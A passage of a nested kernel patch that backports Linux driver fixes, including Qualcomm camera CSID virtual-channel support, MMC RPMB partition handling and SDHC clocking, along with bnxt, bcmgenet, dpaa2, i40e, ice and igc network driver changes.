+ 		val |= dt_id << RDI_CFG0_DT_ID;
+-		writel_relaxed(val, csid->base + CSID_RDI_CFG0(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CFG0(vc));
+ 
+ 		/* CSID_TIMESTAMP_STB_POST_IRQ */
+ 		val = 2 << RDI_CFG1_TIMESTAMP_STB_SEL;
+-		writel_relaxed(val, csid->base + CSID_RDI_CFG1(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CFG1(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PATTERN(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PATTERN(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PATTERN(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PATTERN(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_CTRL(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CTRL(vc));
+ 
+-		val = readl_relaxed(csid->base + CSID_RDI_CFG0(0));
++		val = readl_relaxed(csid->base + CSID_RDI_CFG0(vc));
+ 		val |=  1 << RDI_CFG0_ENABLE;
+-		writel_relaxed(val, csid->base + CSID_RDI_CFG0(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CFG0(vc));
+ 	}
+ 
+ 	if (tg->enabled) {
+@@ -446,6 +458,8 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 	writel_relaxed(val, csid->base + CSID_CSI2_RX_CFG0);
+ 
+ 	val = 1 << CSI2_RX_CFG1_PACKET_ECC_CORRECTION_EN;
++	if (vc > 3)
++		val |= 1 << CSI2_RX_CFG1_VC_MODE;
+ 	val |= 1 << CSI2_RX_CFG1_MISR_EN;
+ 	writel_relaxed(val, csid->base + CSID_CSI2_RX_CFG1);
+ 
+@@ -453,7 +467,16 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		val = HALT_CMD_RESUME_AT_FRAME_BOUNDARY << RDI_CTRL_HALT_CMD;
+ 	else
+ 		val = HALT_CMD_HALT_AT_FRAME_BOUNDARY << RDI_CTRL_HALT_CMD;
+-	writel_relaxed(val, csid->base + CSID_RDI_CTRL(0));
++	writel_relaxed(val, csid->base + CSID_RDI_CTRL(vc));
++}
++
++static void csid_configure_stream(struct csid_device *csid, u8 enable)
++{
++	u8 i;
++	/* Loop through all enabled VCs and configure stream for each */
++	for (i = 0; i < MSM_CSID_MAX_SRC_STREAMS; i++)
++		if (csid->phy.en_vc & BIT(i))
++			__csid_configure_stream(csid, enable, i);
+ }
+ 
+ static int csid_configure_testgen_pattern(struct csid_device *csid, s32 val)
+@@ -499,6 +522,7 @@ static irqreturn_t csid_isr(int irq, void *dev)
+ 	struct csid_device *csid = dev;
+ 	u32 val;
+ 	u8 reset_done;
++	int i;
+ 
+ 	val = readl_relaxed(csid->base + CSID_TOP_IRQ_STATUS);
+ 	writel_relaxed(val, csid->base + CSID_TOP_IRQ_CLEAR);
+@@ -507,8 +531,12 @@ static irqreturn_t csid_isr(int irq, void *dev)
+ 	val = readl_relaxed(csid->base + CSID_CSI2_RX_IRQ_STATUS);
+ 	writel_relaxed(val, csid->base + CSID_CSI2_RX_IRQ_CLEAR);
+ 
+-	val = readl_relaxed(csid->base + CSID_CSI2_RDIN_IRQ_STATUS(0));
+-	writel_relaxed(val, csid->base + CSID_CSI2_RDIN_IRQ_CLEAR(0));
++	/* Read and clear IRQ status for each enabled RDI channel */
++	for (i = 0; i < MSM_CSID_MAX_SRC_STREAMS; i++)
++		if (csid->phy.en_vc & BIT(i)) {
++			val = readl_relaxed(csid->base + CSID_CSI2_RDIN_IRQ_STATUS(i));
++			writel_relaxed(val, csid->base + CSID_CSI2_RDIN_IRQ_CLEAR(i));
++		}
+ 
+ 	val = 1 << IRQ_CMD_CLEAR;
+ 	writel_relaxed(val, csid->base + CSID_IRQ_CMD);
+diff --git a/drivers/media/platform/qcom/camss/camss-csid.c b/drivers/media/platform/qcom/camss/camss-csid.c
+index 88f188e0f7501..6360314f04a63 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid.c
++++ b/drivers/media/platform/qcom/camss/camss-csid.c
+@@ -196,6 +196,8 @@ static int csid_set_power(struct v4l2_subdev *sd, int on)
+ 			return ret;
+ 		}
+ 
++		csid->phy.need_vc_update = true;
++
+ 		enable_irq(csid->irq);
+ 
+ 		ret = csid->ops->reset(csid);
+@@ -249,7 +251,10 @@ static int csid_set_stream(struct v4l2_subdev *sd, int enable)
+ 			return -ENOLINK;
+ 	}
+ 
+-	csid->ops->configure_stream(csid, enable);
++	if (csid->phy.need_vc_update) {
++		csid->ops->configure_stream(csid, enable);
++		csid->phy.need_vc_update = false;
++	}
+ 
+ 	return 0;
+ }
+@@ -460,6 +465,7 @@ static int csid_set_format(struct v4l2_subdev *sd,
+ {
+ 	struct csid_device *csid = v4l2_get_subdevdata(sd);
+ 	struct v4l2_mbus_framefmt *format;
++	int i;
+ 
+ 	format = __csid_get_format(csid, sd_state, fmt->pad, fmt->which);
+ 	if (format == NULL)
+@@ -468,14 +474,14 @@ static int csid_set_format(struct v4l2_subdev *sd,
+ 	csid_try_format(csid, sd_state, fmt->pad, &fmt->format, fmt->which);
+ 	*format = fmt->format;
+ 
+-	/* Propagate the format from sink to source */
++	/* Propagate the format from sink to source pads */
+ 	if (fmt->pad == MSM_CSID_PAD_SINK) {
+-		format = __csid_get_format(csid, sd_state, MSM_CSID_PAD_SRC,
+-					   fmt->which);
++		for (i = MSM_CSID_PAD_FIRST_SRC; i < MSM_CSID_PADS_NUM; ++i) {
++			format = __csid_get_format(csid, sd_state, i, fmt->which);
+ 
+-		*format = fmt->format;
+-		csid_try_format(csid, sd_state, MSM_CSID_PAD_SRC, format,
+-				fmt->which);
++			*format = fmt->format;
++			csid_try_format(csid, sd_state, i, format, fmt->which);
++		}
+ 	}
+ 
+ 	return 0;
+@@ -738,7 +744,6 @@ static int csid_link_setup(struct media_entity *entity,
+ 		struct csid_device *csid;
+ 		struct csiphy_device *csiphy;
+ 		struct csiphy_lanes_cfg *lane_cfg;
+-		struct v4l2_subdev_format format = { 0 };
+ 
+ 		sd = media_entity_to_v4l2_subdev(entity);
+ 		csid = v4l2_get_subdevdata(sd);
+@@ -761,11 +766,22 @@ static int csid_link_setup(struct media_entity *entity,
+ 		lane_cfg = &csiphy->cfg.csi2->lane_cfg;
+ 		csid->phy.lane_cnt = lane_cfg->num_data;
+ 		csid->phy.lane_assign = csid_get_lane_assign(lane_cfg);
++	}
++	/* Decide which virtual channels to enable based on which source pads are enabled */
++	if (local->flags & MEDIA_PAD_FL_SOURCE) {
++		struct v4l2_subdev *sd = media_entity_to_v4l2_subdev(entity);
++		struct csid_device *csid = v4l2_get_subdevdata(sd);
++		struct device *dev = csid->camss->dev;
++
++		if (flags & MEDIA_LNK_FL_ENABLED)
++			csid->phy.en_vc |= BIT(local->index - 1);
++		else
++			csid->phy.en_vc &= ~BIT(local->index - 1);
+ 
+-		/* Reset format on source pad to sink pad format */
+-		format.pad = MSM_CSID_PAD_SRC;
+-		format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+-		csid_set_format(&csid->subdev, NULL, &format);
++		csid->phy.need_vc_update = true;
++
++		dev_dbg(dev, "%s: Enabled CSID virtual channels mask 0x%x\n",
++			__func__, csid->phy.en_vc);
+ 	}
+ 
+ 	return 0;
+@@ -816,6 +832,7 @@ int msm_csid_register_entity(struct csid_device *csid,
+ 	struct v4l2_subdev *sd = &csid->subdev;
+ 	struct media_pad *pads = csid->pads;
+ 	struct device *dev = csid->camss->dev;
++	int i;
+ 	int ret;
+ 
+ 	v4l2_subdev_init(sd, &csid_v4l2_ops);
+@@ -852,7 +869,8 @@ int msm_csid_register_entity(struct csid_device *csid,
+ 	}
+ 
+ 	pads[MSM_CSID_PAD_SINK].flags = MEDIA_PAD_FL_SINK;
+-	pads[MSM_CSID_PAD_SRC].flags = MEDIA_PAD_FL_SOURCE;
++	for (i = MSM_CSID_PAD_FIRST_SRC; i < MSM_CSID_PADS_NUM; ++i)
++		pads[i].flags = MEDIA_PAD_FL_SOURCE;
+ 
+ 	sd->entity.function = MEDIA_ENT_F_PROC_VIDEO_PIXEL_FORMATTER;
+ 	sd->entity.ops = &csid_media_ops;
+diff --git a/drivers/media/platform/qcom/camss/camss-csid.h b/drivers/media/platform/qcom/camss/camss-csid.h
+index f06040e44c515..d4b48432a0973 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid.h
++++ b/drivers/media/platform/qcom/camss/camss-csid.h
+@@ -19,8 +19,13 @@
+ #include <media/v4l2-subdev.h>
+ 
+ #define MSM_CSID_PAD_SINK 0
+-#define MSM_CSID_PAD_SRC 1
+-#define MSM_CSID_PADS_NUM 2
++#define MSM_CSID_PAD_FIRST_SRC 1
++#define MSM_CSID_PADS_NUM 5
++
++#define MSM_CSID_PAD_SRC (MSM_CSID_PAD_FIRST_SRC)
++
++/* CSID hardware can demultiplex up to 4 outputs */
++#define MSM_CSID_MAX_SRC_STREAMS	4
+ 
+ #define DATA_TYPE_EMBEDDED_DATA_8BIT	0x12
+ #define DATA_TYPE_YUV420_8BIT		0x18
+@@ -81,6 +86,8 @@ struct csid_phy_config {
+ 	u8 csiphy_id;
+ 	u8 lane_cnt;
+ 	u32 lane_assign;
++	u32 en_vc;
++	u8 need_vc_update;
+ };
+ 
+ struct csid_device;
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 770490234c872..e9ce53d200bc1 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -866,9 +866,10 @@ static const struct block_device_operations mmc_bdops = {
+ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ 				   unsigned int part_type)
+ {
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if (part_type == EXT_CSD_PART_CONFIG_ACC_RPMB) {
++	if ((part_type & mask) == mask) {
+ 		if (card->ext_csd.cmdq_en) {
+ 			ret = mmc_cmdq_disable(card);
+ 			if (ret)
+@@ -883,9 +884,10 @@ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ static int mmc_blk_part_switch_post(struct mmc_card *card,
+ 				    unsigned int part_type)
+ {
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if (part_type == EXT_CSD_PART_CONFIG_ACC_RPMB) {
++	if ((part_type & mask) == mask) {
+ 		mmc_retune_unpause(card->host);
+ 		if (card->reenable_cmdq && !card->ext_csd.cmdq_en)
+ 			ret = mmc_cmdq_enable(card);
+@@ -3180,4 +3182,3 @@ module_exit(mmc_blk_exit);
+ 
+ MODULE_LICENSE("GPL");
+ MODULE_DESCRIPTION("Multimedia Card (MMC) block device driver");
+-
+diff --git a/drivers/mmc/core/host.c b/drivers/mmc/core/host.c
+index b89dca1f15e9c..25c152ef5d60e 100644
+--- a/drivers/mmc/core/host.c
++++ b/drivers/mmc/core/host.c
+@@ -670,6 +670,7 @@ EXPORT_SYMBOL(mmc_remove_host);
+  */
+ void mmc_free_host(struct mmc_host *host)
+ {
++	cancel_delayed_work_sync(&host->detect);
+ 	mmc_pwrseq_free(host);
+ 	put_device(&host->class_dev);
+ }
+diff --git a/drivers/mmc/host/meson-mx-sdhc-mmc.c b/drivers/mmc/host/meson-mx-sdhc-mmc.c
+index da85c2f2acb83..c0e3b1634a88a 100644
+--- a/drivers/mmc/host/meson-mx-sdhc-mmc.c
++++ b/drivers/mmc/host/meson-mx-sdhc-mmc.c
+@@ -269,7 +269,7 @@ static int meson_mx_sdhc_enable_clks(struct mmc_host *mmc)
+ static int meson_mx_sdhc_set_clk(struct mmc_host *mmc, struct mmc_ios *ios)
+ {
+ 	struct meson_mx_sdhc_host *host = mmc_priv(mmc);
+-	u32 rx_clk_phase;
++	u32 val, rx_clk_phase;
+ 	int ret;
+ 
+ 	meson_mx_sdhc_disable_clks(mmc);
+@@ -290,27 +290,11 @@ static int meson_mx_sdhc_set_clk(struct mmc_host *mmc, struct mmc_ios *ios)
+ 		mmc->actual_clock = clk_get_rate(host->sd_clk);
+ 
+ 		/*
+-		 * according to Amlogic the following latching points are
+-		 * selected with empirical values, there is no (known) formula
+-		 * to calculate these.
++		 * Phase 90 should work in most cases. For data transmission,
++		 * meson_mx_sdhc_execute_tuning() will find a accurate value
+ 		 */
+-		if (mmc->actual_clock > 100000000) {
+-			rx_clk_phase = 1;
+-		} else if (mmc->actual_clock > 45000000) {
+-			if (ios->signal_voltage == MMC_SIGNAL_VOLTAGE_330)
+-				rx_clk_phase = 15;
+-			else
+-				rx_clk_phase = 11;
+-		} else if (mmc->actual_clock >= 25000000) {
+-			rx_clk_phase = 15;
+-		} else if (mmc->actual_clock > 5000000) {
+-			rx_clk_phase = 23;
+-		} else if (mmc->actual_clock > 1000000) {
+-			rx_clk_phase = 55;
+-		} else {
+-			rx_clk_phase = 1061;
+-		}
+-
++		regmap_read(host->regmap, MESON_SDHC_CLKC, &val);
++		rx_clk_phase = FIELD_GET(MESON_SDHC_CLKC_CLK_DIV, val) / 4;
+ 		regmap_update_bits(host->regmap, MESON_SDHC_CLK2,
+ 				   MESON_SDHC_CLK2_RX_CLK_PHASE,
+ 				   FIELD_PREP(MESON_SDHC_CLK2_RX_CLK_PHASE,
+diff --git a/drivers/mmc/host/sdhci-sprd.c b/drivers/mmc/host/sdhci-sprd.c
+index 2101b6e794c0e..66c1782823d89 100644
+--- a/drivers/mmc/host/sdhci-sprd.c
++++ b/drivers/mmc/host/sdhci-sprd.c
+@@ -228,15 +228,19 @@ static inline void _sdhci_sprd_set_clock(struct sdhci_host *host,
+ 	div = ((div & 0x300) >> 2) | ((div & 0xFF) << 8);
+ 	sdhci_enable_clk(host, div);
+ 
++	val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
++	mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN | SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
+ 	/* Enable CLK_AUTO when the clock is greater than 400K. */
+ 	if (clk > 400000) {
+-		val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
+-		mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN |
+-			SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
+ 		if (mask != (val & mask)) {
+ 			val |= mask;
+ 			sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
+ 		}
++	} else {
++		if (val & mask) {
++			val &= ~mask;
++			sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 623cdeb29ed90..df4d88d35701b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -12081,6 +12081,8 @@ static void bnxt_sp_task(struct work_struct *work)
+ 		bnxt_cfg_ntp_filters(bp);
+ 	if (test_and_clear_bit(BNXT_HWRM_EXEC_FWD_REQ_SP_EVENT, &bp->sp_event))
+ 		bnxt_hwrm_exec_fwd_req(bp);
++	if (test_and_clear_bit(BNXT_HWRM_PF_UNLOAD_SP_EVENT, &bp->sp_event))
++		netdev_info(bp->dev, "Receive PF driver unload event!\n");
+ 	if (test_and_clear_bit(BNXT_PERIODIC_STATS_SP_EVENT, &bp->sp_event)) {
+ 		bnxt_hwrm_port_qstats(bp, 0);
+ 		bnxt_hwrm_port_qstats_ext(bp, 0);
+@@ -13059,8 +13061,6 @@ static void bnxt_cfg_ntp_filters(struct bnxt *bp)
+ 			}
+ 		}
+ 	}
+-	if (test_and_clear_bit(BNXT_HWRM_PF_UNLOAD_SP_EVENT, &bp->sp_event))
+-		netdev_info(bp->dev, "Receive PF driver unload event!\n");
+ }
+ 
+ #else
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 1ae082eb9e905..c2a9913082153 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2131,8 +2131,10 @@ static netdev_tx_t bcmgenet_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		/* Note: if we ever change from DMA_TX_APPEND_CRC below we
+ 		 * will need to restore software padding of "runt" packets
+ 		 */
++		len_stat |= DMA_TX_APPEND_CRC;
++
+ 		if (!i) {
+-			len_stat |= DMA_TX_APPEND_CRC | DMA_SOP;
++			len_stat |= DMA_SOP;
+ 			if (skb->ip_summed == CHECKSUM_PARTIAL)
+ 				len_stat |= DMA_TX_DO_CSUM;
+ 		}
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index b58162ce81d87..de62eee58a00e 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -509,8 +509,6 @@ static struct sk_buff *dpaa2_eth_copybreak(struct dpaa2_eth_channel *ch,
+ 
+ 	memcpy(skb->data, fd_vaddr + fd_offset, fd_length);
+ 
+-	dpaa2_eth_recycle_buf(priv, ch, dpaa2_fd_get_addr(fd));
+-
+ 	return skb;
+ }
+ 
+@@ -528,6 +526,7 @@ static void dpaa2_eth_rx(struct dpaa2_eth_priv *priv,
+ 	struct dpaa2_eth_drv_stats *percpu_extras;
+ 	struct device *dev = priv->net_dev->dev.parent;
+ 	struct dpaa2_fas *fas;
++	bool recycle_rx_buf = false;
+ 	void *buf_data;
+ 	u32 status = 0;
+ 	u32 xdp_act;
+@@ -560,6 +559,8 @@ static void dpaa2_eth_rx(struct dpaa2_eth_priv *priv,
+ 			dma_unmap_page(dev, addr, priv->rx_buf_size,
+ 				       DMA_BIDIRECTIONAL);
+ 			skb = dpaa2_eth_build_linear_skb(ch, fd, vaddr);
++		} else {
++			recycle_rx_buf = true;
+ 		}
+ 	} else if (fd_format == dpaa2_fd_sg) {
+ 		WARN_ON(priv->xdp_prog);
+@@ -607,6 +608,8 @@ static void dpaa2_eth_rx(struct dpaa2_eth_priv *priv,
+ 
+ 	list_add_tail(&skb->list, ch->rx_list);
+ 
++	if (recycle_rx_buf)
++		dpaa2_eth_recycle_buf(priv, ch, dpaa2_fd_get_addr(fd));
+ 	return;
+ 
+ err_build_skb:
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c
+index eea7d7a07c007..59888826469b9 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c
+@@ -227,17 +227,8 @@ static void dpaa2_eth_get_ethtool_stats(struct net_device *net_dev,
+ 					struct ethtool_stats *stats,
+ 					u64 *data)
+ {
+-	int i = 0;
+-	int j, k, err;
+-	int num_cnt;
+-	union dpni_statistics dpni_stats;
+-	u32 fcnt, bcnt;
+-	u32 fcnt_rx_total = 0, fcnt_tx_total = 0;
+-	u32 bcnt_rx_total = 0, bcnt_tx_total = 0;
+-	u32 buf_cnt;
+ 	struct dpaa2_eth_priv *priv = netdev_priv(net_dev);
+-	struct dpaa2_eth_drv_stats *extras;
+-	struct dpaa2_eth_ch_stats *ch_stats;
++	union dpni_statistics dpni_stats;
+ 	int dpni_stats_page_size[DPNI_STATISTICS_CNT] = {
+ 		sizeof(dpni_stats.page_0),
+ 		sizeof(dpni_stats.page_1),
+@@ -247,6 +238,13 @@ static void dpaa2_eth_get_ethtool_stats(struct net_device *net_dev,
+ 		sizeof(dpni_stats.page_5),
+ 		sizeof(dpni_stats.page_6),
+ 	};
++	u32 fcnt_rx_total = 0, fcnt_tx_total = 0;
++	u32 bcnt_rx_total = 0, bcnt_tx_total = 0;
++	struct dpaa2_eth_ch_stats *ch_stats;
++	struct dpaa2_eth_drv_stats *extras;
++	int j, k, err, num_cnt, i = 0;
++	u32 fcnt, bcnt;
++	u32 buf_cnt;
+ 
+ 	memset(data, 0,
+ 	       sizeof(u64) * (DPAA2_ETH_NUM_STATS + DPAA2_ETH_NUM_EXTRA_STATS));
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index b4157ff370a31..63d43ef86f9b9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -104,12 +104,18 @@ static struct workqueue_struct *i40e_wq;
+ static void netdev_hw_addr_refcnt(struct i40e_mac_filter *f,
+ 				  struct net_device *netdev, int delta)
+ {
++	struct netdev_hw_addr_list *ha_list;
+ 	struct netdev_hw_addr *ha;
+ 
+ 	if (!f || !netdev)
+ 		return;
+ 
+-	netdev_for_each_mc_addr(ha, netdev) {
++	if (is_unicast_ether_addr(f->macaddr) || is_link_local_ether_addr(f->macaddr))
++		ha_list = &netdev->uc;
++	else
++		ha_list = &netdev->mc;
++
++	netdev_hw_addr_list_for_each(ha, ha_list) {
+ 		if (ether_addr_equal(ha->addr, f->macaddr)) {
+ 			ha->refcount += delta;
+ 			if (ha->refcount <= 0)
+@@ -16444,6 +16450,9 @@ static void i40e_pci_error_reset_done(struct pci_dev *pdev)
+ 		return;
+ 
+ 	i40e_reset_and_rebuild(pf, false, false);
++#ifdef CONFIG_PCI_IOV
++	i40e_restore_all_vfs_msi_state(pdev);
++#endif /* CONFIG_PCI_IOV */
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index cb925baf72ce0..c7d761426d6ce 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -152,6 +152,32 @@ void i40e_vc_notify_reset(struct i40e_pf *pf)
+ 			     (u8 *)&pfe, sizeof(struct virtchnl_pf_event));
+ }
+ 
++#ifdef CONFIG_PCI_IOV
++void i40e_restore_all_vfs_msi_state(struct pci_dev *pdev)
++{
++	u16 vf_id;
++	u16 pos;
++
++	/* Continue only if this is a PF */
++	if (!pdev->is_physfn)
++		return;
++
++	if (!pci_num_vf(pdev))
++		return;
++
++	pos = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_SRIOV);
++	if (pos) {
++		struct pci_dev *vf_dev = NULL;
++
++		pci_read_config_word(pdev, pos + PCI_SRIOV_VF_DID, &vf_id);
++		while ((vf_dev = pci_get_device(pdev->vendor, vf_id, vf_dev))) {
++			if (vf_dev->is_virtfn && vf_dev->physfn == pdev)
++				pci_restore_msi_state(vf_dev);
++		}
++	}
++}
++#endif /* CONFIG_PCI_IOV */
++
+ /**
+  * i40e_vc_notify_vf_reset
+  * @vf: pointer to the VF structure
+@@ -3451,16 +3477,16 @@ static int i40e_validate_cloud_filter(struct i40e_vf *vf,
+ 	bool found = false;
+ 	int bkt;
+ 
+-	if (!tc_filter->action) {
++	if (tc_filter->action != VIRTCHNL_ACTION_TC_REDIRECT) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VF %d: Currently ADq doesn't support Drop Action\n",
+-			 vf->vf_id);
++			 "VF %d: ADQ doesn't support this action (%d)\n",
++			 vf->vf_id, tc_filter->action);
+ 		goto err;
+ 	}
+ 
+ 	/* action_meta is TC number here to which the filter is applied */
+ 	if (!tc_filter->action_meta ||
+-	    tc_filter->action_meta > I40E_MAX_VF_VSI) {
++	    tc_filter->action_meta > vf->num_tc) {
+ 		dev_info(&pf->pdev->dev, "VF %d: Invalid TC number %u\n",
+ 			 vf->vf_id, tc_filter->action_meta);
+ 		goto err;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+index 358bbdb587951..bd497cc5303a1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+@@ -135,6 +135,9 @@ int i40e_ndo_set_vf_spoofchk(struct net_device *netdev, int vf_id, bool enable);
+ 
+ void i40e_vc_notify_link_state(struct i40e_pf *pf);
+ void i40e_vc_notify_reset(struct i40e_pf *pf);
++#ifdef CONFIG_PCI_IOV
++void i40e_restore_all_vfs_msi_state(struct pci_dev *pdev);
++#endif /* CONFIG_PCI_IOV */
+ int i40e_get_vf_stats(struct net_device *netdev, int vf_id,
+ 		      struct ifla_vf_stats *vf_stats);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index f0f39364819ac..ab46cfca4028d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -2138,7 +2138,7 @@ static int ice_configure_phy(struct ice_vsi *vsi)
+ 
+ 	/* Ensure we have media as we cannot configure a medialess port */
+ 	if (!(phy->link_info.link_info & ICE_AQ_MEDIA_AVAILABLE))
+-		return -EPERM;
++		return -ENOMEDIUM;
+ 
+ 	ice_print_topo_conflict(vsi);
+ 
+@@ -9065,8 +9065,14 @@ int ice_stop(struct net_device *netdev)
+ 		int link_err = ice_force_phys_link_state(vsi, false);
+ 
+ 		if (link_err) {
+-			netdev_err(vsi->netdev, "Failed to set physical link down, VSI %d error %d\n",
+-				   vsi->vsi_num, link_err);
++			if (link_err == -ENOMEDIUM)
++				netdev_info(vsi->netdev, "Skipping link reconfig - no media attached, VSI %d\n",
++					    vsi->vsi_num);
++			else
++				netdev_err(vsi->netdev, "Failed to set physical link down, VSI %d error %d\n",
++					   vsi->vsi_num, link_err);
++
++			ice_vsi_close(vsi);
+ 			return -EIO;
+ 		}
+ 	}
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index 43c05b41627f7..2a894ca49d93b 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -538,6 +538,7 @@ struct igc_nfc_filter {
+ 	u16 etype;
+ 	__be16 vlan_etype;
+ 	u16 vlan_tci;
++	u16 vlan_tci_mask;
+ 	u8 src_addr[ETH_ALEN];
+ 	u8 dst_addr[ETH_ALEN];
+ 	u8 user_data[8];
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 81897f7a90a91..2bee9cace5983 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -957,6 +957,7 @@ static int igc_ethtool_set_coalesce(struct net_device *netdev,
+ }
+ 
+ #define ETHER_TYPE_FULL_MASK ((__force __be16)~0)
++#define VLAN_TCI_FULL_MASK ((__force __be16)~0)
+ static int igc_ethtool_get_nfc_rule(struct igc_adapter *adapter,
+ 				    struct ethtool_rxnfc *cmd)
+ {
+@@ -979,10 +980,16 @@ static int igc_ethtool_get_nfc_rule(struct igc_adapter *adapter,
+ 		fsp->m_u.ether_spec.h_proto = ETHER_TYPE_FULL_MASK;
+ 	}
+ 
++	if (rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_ETYPE) {
++		fsp->flow_type |= FLOW_EXT;
++		fsp->h_ext.vlan_etype = rule->filter.vlan_etype;
++		fsp->m_ext.vlan_etype = ETHER_TYPE_FULL_MASK;
++	}
++
+ 	if (rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_TCI) {
+ 		fsp->flow_type |= FLOW_EXT;
+ 		fsp->h_ext.vlan_tci = htons(rule->filter.vlan_tci);
+-		fsp->m_ext.vlan_tci = htons(VLAN_PRIO_MASK);
++		fsp->m_ext.vlan_tci = htons(rule->filter.vlan_tci_mask);
+ 	}
+ 
+ 	if (rule->filter.match_flags & IGC_FILTER_FLAG_DST_MAC_ADDR) {
+@@ -1217,6 +1224,7 @@ static void igc_ethtool_init_nfc_rule(struct igc_nfc_rule *rule,
+ 
